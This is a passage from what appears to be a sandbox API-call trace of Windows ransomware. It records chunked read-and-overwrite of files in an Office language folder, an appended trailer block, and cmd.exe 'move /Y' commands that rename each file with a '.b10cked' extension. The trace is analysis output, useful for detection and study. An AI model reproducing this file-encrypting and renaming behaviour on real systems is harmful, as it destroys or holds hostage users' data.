lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.614] VirtualFree (lpAddress=0x7ff10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.616] SetFilePointer (in: hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0153.616] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.733] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.742] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.750] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.752] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.753] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.756] SetFilePointer (in: hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0153.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.757] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.757] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.757] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.759] SetFilePointer (in: hFile=0x114, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x280000 [0153.759] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.772] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.775] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.775] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.894] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.896] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x280000 [0153.899] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.900] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.900] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.901] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.901] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.901] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.903] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28ed60 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.906] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.909] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28ed60 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.910] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0153.910] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0153.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2ced60 [0153.918] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.918] CloseHandle (hObject=0x114) returned 1 [0154.048] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX") returned 0x3c [0154.049] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0154.050] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x8ac, dwThreadId=0xda8)) returned 1 [0154.052] CloseHandle (hObject=0x110) returned 1 [0154.052] CloseHandle (hObject=0x114) returned 1 [0154.052] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.052] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.052] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.052] ReleaseMutex (hMutex=0xf8) returned 1 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.052] ReleaseMutex (hMutex=0xf8) returned 1 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.052] ReleaseMutex (hMutex=0xf8) returned 1 [0154.052] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.053] ReleaseMutex (hMutex=0xf8) returned 1 [0154.053] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.144] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21093358458) returned 1 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xae78 [0154.146] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb360 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb360 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.833] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0154.841] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.841] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0154.841] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0154.841] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0154.843] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0154.843] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0154.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0154.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0154.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb360 [0154.848] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0154.848] CloseHandle (hObject=0x114) returned 1 [0154.848] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX") returned 0x3c [0154.849] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0154.850] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, 